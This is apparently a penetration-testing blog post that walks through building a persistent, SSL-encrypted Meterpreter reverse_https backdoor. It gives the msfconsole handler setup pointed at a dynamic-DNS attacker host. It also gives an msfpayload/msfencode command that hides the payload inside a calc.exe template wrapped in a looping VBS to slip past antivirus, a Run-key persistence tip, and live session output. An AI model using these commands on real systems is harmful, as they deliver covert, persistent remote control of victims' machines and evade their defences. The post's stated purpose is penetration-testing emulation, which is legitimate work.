Botnet agents and malware go through inordinate lengths to hide their command and control traffic. From a penetration testing perspective, emulating these types of communication channels is possible, but often requires a custom toolkit to be deployed to the target. In this post I will walk through using the standard Metasploit Meterpreter payload as a persistent encrypted remote control tool.
Next, we need to setup a listening station for the remote system to connect to. This is the system that will be running msfconsole and handling the incoming connections. The two important variables here are the hostname or IP address (LHOST) and the listening port (LPORT). If you do not have access to a dedicated external system, you will need to configure your local firewall or NAT gateway to forward LPORT from the external interface to your listener. In this example, we want to use the brand new reverse_https stager, which in addition to going over SSL has the benefit of resolving DNS at runtime. This stager, along with reverse_tcp_dns, allows an actual hostname to be specified in the LHOST parameter. If you are using a dynamic DNS service, this would allow the reverse connect payload to follow your DNS changes.
Assuming we are running Metasploit on a typical broadband connection and behind a NAT gateway, we would first register our system with a dynamic DNS service (metasploit.kicks-ass.net), choose a listening port (8443) and then forward this from the NAT gateway to our internal machine running Metasploit. Once the port forward has been configured and the dynamic DNS entry has been activated, we can start msfconsole:
$ msfconsole msf > use exploit/multi/handler msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_https msf exploit(handler) > set LPORT 8443 msf exploit(handler) > set LHOST metasploit.kicks-ass.net msf exploit(handler) > set ExitOnSession false msf exploit(handler) > exploit -j [*] HTTPS listener started on http://metasploit.kicks-ass.net:8443/ [*] Starting the payload handler...
Once the listener has been configured, you can test whether the handler is working properly by using a third-party web site test tool that supports SSL. I have had success using WAVE, but any "site check" tool will indicate whether the handler is accessible. If you access the handler URL in your browser, you should see an invalid SSL certificate prompt followed by a "No site configured at this address" message.
After the listener has been configured and tested, its time to create the actual persistent Meterpreter connect-back script. In order to avoid some of the more bothersome AV products, it makes sense to use a benign executable as a "template" and inject the payload inside, then wrap this all in a script. On your system running Metasploit, identify an executable to use as the template. I often use the standard calc.exe that ships with Windows operating system, but any moderately-sized EXE will do. Once the template has been identified, create a reverse_https Meterpreter, using the EXE template, wrapped in a script, with a persistent retry. The following command does this:
$ msfpayload windows/meterpreter/reverse_https LHOST=metasploit.kicks-ass.net LPORT=8443 R | msfencode -x calc.exe -t loop-vbs -o final.vbs [*] x86/shikata_ga_nai succeeded with size 408 (iteration=1) $ ls -la final.vbs -rw-r--r-- 1 hdm hdm 955641 Apr 13 08:51 final.vbs
Finally, execute the VBS on the target system, and enjoy a 100% SSL-encrypted, DNS-aware, persistent remote connect-back. The reconnect interval can be changed by editing the VBS script itself (all the way at the bottom). To stop the connect-back, simply kill the wscript.exe process. To make this persist across reboots, add this to the standard Run key or the Startup folder.
[*] A.B.C.D:53386 Request received for /AVkev... [*] A.B.C.D:53386 Staging connection for target Vkev received... [*] Patching Target ID Vkev into DLL [*] A.B.C.D:53387 Request received for /BVkev... [*] A.B.C.D:53387 Stage connection for target Vkev received... [*] Meterpreter session 2 opened (192.168.0.228:8443 -> A.B.C.D:53387) msf exploit(handler) > sessions -i 2 [*] Starting interaction with 2... meterpreter > getuid Server username: metal\dev meterpreter > ps Process list ============ PID Name Arch Session User Path --- ---- ---- ------- ---- ---- 0 [System Process] 4 System 404 smss.exe 520 csrss.exe 584 wininit.exe 608 csrss.exe 648 services.exe 668 lsass.exe 676 lsm.exe 792 svchost.exe 852 nvvsvc.exe 892 svchost.exe [truncated]
For more information about how the reverse_https and reverse_tcp_dns stagers work, I recommend reading the source. While the initial stage supports SSL, DNS, proxies, and authentication, the second stage does not support the last two features (yet).